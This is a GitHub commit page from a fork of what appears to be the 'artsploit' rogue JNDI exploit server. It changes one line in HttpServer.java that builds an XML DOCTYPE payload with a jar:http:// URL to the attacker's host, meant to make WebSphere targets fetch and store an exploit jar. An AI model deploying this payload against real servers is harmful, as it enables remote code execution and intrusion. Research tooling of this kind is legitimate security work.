Skip to content

Commit

Permalink
Fixed veracode-research#6 in upstream
Browse files Browse the repository at this point in the history
  • Loading branch information
wh1tenoise committed Dec 22, 2021
1 parent 1aa5a5d commit 085bb83
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion src/main/java/artsploit/HttpServer.java
Original file line number Diff line number Diff line change
Expand Up @@ -92,7 +92,7 @@ public void handle(HttpExchange httpExchange) {
//payload for artsploit.controllers.WebSphere1-2
//intended to upload xExploitObject.jar into the /temp directory on server
String uploadWsdl = "<!DOCTYPE a SYSTEM \"jar:http://" + Config.hostname + ":" + Config.httpPort +
"/xExploitObject.jar!/file.txt\"><a></a>";
"/xExportObject.jar!/file.txt\"><a></a>";
httpExchange.sendResponseHeaders(200, uploadWsdl.getBytes().length);
httpExchange.getResponseBody().write(uploadWsdl.getBytes());
break;
Expand Down

0 comments on commit 085bb83

Please sign in to comment.